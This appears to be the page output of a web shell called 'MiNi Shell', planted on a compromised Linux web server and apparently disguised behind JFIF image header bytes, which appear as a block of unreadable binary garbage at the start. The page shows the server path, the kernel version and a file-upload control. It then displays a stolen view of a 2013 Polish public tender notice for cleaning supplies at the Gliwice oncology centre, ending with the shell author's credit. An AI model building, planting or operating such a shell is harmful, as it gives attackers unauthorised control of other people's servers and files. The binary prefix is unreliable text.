JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130219/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130219/69272-N-2013.html

<p class="kh_header"><b>Gliwice: Sukcesywna dostawa środków czystości i drobnego sprzętu gospodarczego dla potrzeb Centrum Onkologii - Instytutu Oddział w Gliwicach</b><br>
<b>Numer ogłoszenia: 69272 - 2013; data zamieszczenia: 19.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Onkologii-Instytut im. Marii Skłodowskiej-Curie Oddział w Gliwicach , ul. Wybrzeże Armii Krajowej 15, 44-101 Gliwice, woj. śląskie, tel. 032 2789171, 2789172, 2789193,, faks 032 2789197, 2789198.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.io.gliwice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut Badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa środków czystości i drobnego sprzętu gospodarczego dla potrzeb Centrum Onkologii - Instytutu Oddział w Gliwicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sukcesywna dostawa środków czystości i drobnego sprzętu gospodarczego dla potrzeb Centrum Onkologii - Instytutu Oddział w Gliwicach, (poniżej 200 tyś euro)
zadanie 1. środki czystości ogólnego zastosowania I
zadanie 2. środki czystości ogólnego zastosowania II
zadanie 3. środki higieniczne
zadanie 4. ścierki z mikrofazy
zadanie 5. drobny sprzęt gospodarczy I
zadanie 6. mopy kieszeniowe
zadanie 7. sprzęt gospodarczy II
zadanie 8. środek do podłóg
zadanie 9. środki czystości dla Działu Żywienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9, 33.76.00.00-5, 39.51.42.00-0, 39.72.00.00-5, 39.80.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.07.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda złożenia oświadczenia o spełnieniu warunków udziału w postępowaniu - załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda złożenia oświadczenia o spełnieniu warunków udziału w postępowaniu - załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda złożenia oświadczenia o spełnieniu warunków udziału w postępowaniu - załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda złożenia oświadczenia o spełnieniu warunków udziału w postępowaniu - załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda złożenia oświadczenia o spełnieniu warunków udziału w postępowaniu - załącznik nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego, zamawiający żąda złożenia (wraz z ofertą przetargową) :
a)  etykiety i instrukcje użytkowania preparatu dla każdej pozycji z zadań nr: 1, 2 (poz. 1,2,3,4,8,9,10,11,12,13,14,15,16),  8.   
b)   aktualne karty charakterystyki dla zadań nr: 1, 2 (poz. 1,2,3,4,8,9,10,11,12,13,14,15,16), 8. Karty charakterystyki muszą spełniać wymagania Rozporządzenia Parlamentu Europejskiego REACH 1907/2006r.
c) próbki dla wszystkich pozycji w zakresie zadań od nr 1 do nr 8 w ilości po 1 sztuce, opisanych w sposób umożliwiający pełną identyfikację produktu tj. nr zadania, nr pozycji z zadania, nazwę producenta, a także należy podać nazwę Wykonawcy - (próbki winny stanowić oddzielne opakowanie od oferty). W przypadku zadania nr 9 Zamawiający nie wymaga złożenia próbek.     
d)  w przypadku zadania nr 9 - należy przedłożyć w ofercie w formie oryginału lub kserokopii poświadczonej - za zgodność z oryginałem przez Wykonawcę, w języku polskim następujące dokumenty:
- do każdej pozycji opis oferowanego produktu w postaci ulotki informacyjnej, a także karta charakterystyki 
- w pozycjach do których zostanie zaoferowany produkt sklasyfikowany jako niebezpieczny, wymagamy dostarczenia deklaracji zgodności wystawionej przez producenta lub generalnego dystrybutora potwierdzającej, że produkt spełnia wymogi Wspólnoty Europejskiej dotyczące bezpieczeństwa, ochrony środowiska specyficznych dla substancji lub mieszaniny, w szczególności postanowienia Rozporządzenia UE (WE nr 1907/2006 z aneksem (REACH)
- dla produktów dezynfekcyjnych, biobójczych z pozycji 10 i 11, wymagamy dostarczenie pozwolenia na obrót takimi produktami i potwierdzenie jego klasyfikacji mieszczącej się w kat. I gr 4, co oznacza, że jest to preparat nadający się do pow. mających kontakt z żywnością. 
Dokumenty są składane w języku polskim, w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający z inicjatywy własnej lub Wykonawcy dopuszcza w umowie zmiany w następujących przypadkach: 
a) jakości (na wyższą) zaoferowanych produktów, przy zachowaniu lub obniżeniu ceny
b) numeru katalogowego produktu 
c) zaprzestania produkcji produktu umownego przez producenta i wprowadzenia przez tego producenta nowego produktu analogicznego do produktu wycofanego z rynku, przy zachowaniu lub obniżeniu ceny produktu wycofanego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.io.gliwice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Onkologii - Instytut im. Marii Skłodowskiej - Curie 
Oddział w Gliwicach
ul. Wybrzeże Armii Krajowej 15 
44 - 101 Gliwice
Sekcja Zamówień Publicznych, pok. 2.001.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2013 godzina 10:00, miejsce: Centrum Onkologii - Instytut im. Marii Skłodowskiej - Curie 
Oddział w Gliwicach
ul. Wybrzeże Armii Krajowej 15 
44 - 101 Gliwice
Sekcja Zamówień Publicznych, pok. 2.001.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> środki czystości ogólnego zastosowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> środki czystości ogólnego zastosowania - wielkość i zakres określono szczegółowo w SIWZ (Specyfikacji Asortymentowo - Cenowej).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.07.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. jakość - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> środki czystości ogólnego zastosowania II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> środki czystości ogólnego zastosowania II - wielkość i zakres został szczegółowo określony w SIWZ (Specyfikacji Asortymentowo - Cenowej).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.07.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. jakość - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> środki higieniczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> środki higieniczne - wielkość i zakres został szczegółowo określony w SIWZ (Specyfikacji Asortymentowo - Cenowej).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.76.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.07.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. jakość - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ścierki z mikrofazy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ścierki z mikrofazy - wielkość i zakres zostały szczegółowo określone w SIWZ (Specyfikacji Asortymentowo - Cenowej).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.42.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.07.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. jakość - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> drobny sprzęt gospodarczy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> drobny sprzęt gospodarczy - wielkość i zakres zostały szczegółowo określone w SIWZ (Specyfikacji Asortymentowo - Cenowej).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.72.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.07.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> mopy kieszeniowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> mopy kieszeniowe - wielkość i zakres zostały szczegółowo określone w SIWZ (Specyfikacji Asortymentowo - Cenowej).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.72.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.07.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. jakość - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> sprzęt gospodarczy II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sprzęt gospodarczy II - zakres i wielkość zostały szczegółowo opisane w SIWZ (Specyfikacji Asortymentowo - Cenowej).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.72.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.07.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. jakość - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Środek do podłóg.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Środek do podłóg - wielkość i zakres zostały szczegółowo opisane w SIWZ (Specyfikacji Asortymentowo - Cenowej).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.07.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. jakość - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Środki czystości dla Działu Żywienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Środki czystości dla Działu Żywienia - wielkość i zakres zostały szczegółowo opisane w SIWZ (Specyfikacji Asortymentowo - Cenowej).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.07.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com